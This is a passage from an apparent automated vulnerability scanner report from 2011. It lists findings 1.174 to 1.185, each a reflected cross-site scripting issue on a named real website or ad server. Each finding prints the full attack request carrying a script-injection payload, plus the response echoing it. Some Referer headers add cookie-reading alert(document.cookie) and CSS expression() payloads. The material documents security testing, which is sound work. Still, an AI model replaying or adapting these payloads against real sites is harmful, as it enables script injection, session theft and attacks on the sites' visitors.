The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa21"><script>alert(1)</script>f82fa5ba772 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM1fa21"><script>alert(1)</script>f82fa5ba772/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800+KPMAAfCd; na_tc=Y

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM1fa21"><script>alert(1)</script>f82fa5ba772/DLX/1673624573/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC
...[SNIP]...

1.174. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14b33"><script>alert(1)</script>29f506260ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX14b33"><script>alert(1)</script>29f506260ec/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800+KPMAAfCd; na_tc=Y

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX14b33"><script>alert(1)</script>29f506260ec/1143833049/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC
...[SNIP]...

1.175. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dbe3"><script>alert(1)</script>dc805862fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x963dbe3"><script>alert(1)</script>dc805862fa HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800+KPMAAfCd; na_tc=Y

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1142704585/x963dbe3"><script>alert(1)</script>dc805862fa/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC=
...[SNIP]...

1.176. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload e0eaa<script>alert(1)</script>cd417b31ba9 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1297259925559&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1076724771190722&slotname=blog_postpage_72890e0eaa<script>alert(1)</script>cd417b31ba9&page_slots=blog_postpage_72890&cookie_enabled=1&ga_vid=1798846169.1297259929&ga_sid=1297259929&ga_hid=1078606781&url=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blog.csdn.net/jiji262/archive/2007/07/28/1713771.aspx?3541f'style%3d'x%3aexpression(alert(1))'7b381ee316b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 09 Feb 2011 13:59:26 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 6631

GA_googleSetAdContentsBySlotForSync({"blog_postpage_72890e0eaa<script>alert(1)</script>cd417b31ba9":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#0
...[SNIP]...

1.177. http://redirectingat.com/api/ [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirectingat.com
Path:   /api/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4f8b9<script>alert(1)</script>6deb514662f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/?callback=skimlinksApplyHandlers4f8b9<script>alert(1)</script>6deb514662f&data=%7B%22pubcode%22%3A%223912X635905%22%2C%22domains%22%3A%5B%22kara.allthingsd.com%22%2C%22biggovernment.com%22%2C%22googlemobile.blogspot.com%22%2C%22deadline.com%22%2C%22engadget.com%22%2C%22newyorker.com%22%2C%22mediadecoder.blogs.nytimes.com%22%2C%22krugman.blogs.nytimes.com%22%2C%22artsbeat.blogs.nytimes.com%22%2C%22ubergizmo.com%22%2C%22thinkprogress.org%22%2C%22telegraph.co.uk%22%2C%22ib.adnxs.com%22%2C%22twitter.com%22%2C%22twittorati.com%22%2C%22blogcritics.org%22%2C%22technoratimedia.com%22%2C%22indyposted.com%22%2C%22mixx.com%22%2C%22wesay.com%22%2C%22dailyblogtips.com%22%2C%22environmentalgraffiti.com%22%2C%22blastmagazine.com%22%2C%22justin.tv%22%2C%22stylecrave.com%22%2C%22triond.com%22%2C%22shrinktheweb.com%22%2C%22creativecommons.org%22%5D%7D HTTP/1.1
Host: redirectingat.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:07:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
X-SKIM-Hostname: muttley.skimlinks.com
Content-Length: 90
Connection: close
Content-Type: text/html; charset=UTF-8


skimlinksApplyHandlers4f8b9<script>alert(1)</script>6deb514662f({"merchant_domains":[]});

1.178. http://s.intensedebate.com/images/twitter-favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/twitter-favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b455'><script>alert(1)</script>af37c82c065 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/twitter-favicon.ico2b455'><script>alert(1)</script>af37c82c065 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Wed, 09 Feb 2011 13:31:43 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4719

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/twitter-favicon.ico2b455'><script>alert(1)</script>af37c82c065'>
...[SNIP]...

1.179. http://s.intensedebate.com/themes/universal/images/idc-universal.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /themes/universal/images/idc-universal.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d738a'><script>alert(1)</script>2035d16e5c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/universal/images/idc-universal.pngd738a'><script>alert(1)</script>2035d16e5c6?=4 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Wed, 09 Feb 2011 13:31:56 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4738

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/themes/universal/images/idc-universal.pngd738a'><script>alert(1)</script>2035d16e5c6?=4'>
...[SNIP]...

1.180. https://secure.watchmouse.com/assets/css/fancybox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59f42"><script>alert(1)</script>77fbf6c1c6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets59f42"><script>alert(1)</script>77fbf6c1c6c/css/fancybox.css HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-92c7ea61c53fe0856faf2aa9db8d7ac6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets59f42"><script>alert(1)</script>77fbf6c1c6c/css/fancybox.css" method="post">
...[SNIP]...

1.181. https://secure.watchmouse.com/assets/css/fancybox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2665"><script>alert(1)</script>c61e86157ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/csse2665"><script>alert(1)</script>c61e86157ef/fancybox.css HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-29746f857df2caac146afc49fe4a6ccc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/csse2665"><script>alert(1)</script>c61e86157ef/fancybox.css" method="post">
...[SNIP]...

1.182. https://secure.watchmouse.com/assets/css/fancybox.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b905"><script>alert(1)</script>e5c9d149996 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/fancybox.css5b905"><script>alert(1)</script>e5c9d149996 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-1bf23d5f9c7396d951419f162836f2af"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/fancybox.css5b905"><script>alert(1)</script>e5c9d149996" method="post">
...[SNIP]...

1.183. https://secure.watchmouse.com/assets/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12604"><script>alert(1)</script>c91f43e7654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets12604"><script>alert(1)</script>c91f43e7654/css/print.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-b709bccab9ea05d574af943e7a235c28"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets12604"><script>alert(1)</script>c91f43e7654/css/print.css?20101008" method="post">
...[SNIP]...

1.184. https://secure.watchmouse.com/assets/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ec3a"><script>alert(1)</script>6198b6aec7f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css7ec3a"><script>alert(1)</script>6198b6aec7f/print.css?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:27:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-48967952e7d0bf43ad1488d7fa04691b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css7ec3a"><script>alert(1)</script>6198b6aec7f/print.css?20101008" method="post">
...[SNIP]...

1.185. https://secure.watchmouse.com/assets/css/print.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46990"><script>alert(1)</script>c906927119 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/print.css46990"><script>alert(1)</script>c906927119?20101008 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:28:01 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-a39a891482e0b4031594c7cd351ff9e8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
